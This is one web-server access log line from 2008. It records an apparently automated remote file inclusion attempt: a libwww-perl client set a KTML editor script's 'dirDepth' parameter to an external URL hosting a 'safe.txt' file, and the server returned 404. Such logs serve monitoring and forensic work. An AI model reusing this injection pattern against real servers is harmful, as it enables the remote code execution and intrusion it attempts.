83.172.140.17 - - [17/Aug/2008:05:43:36 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
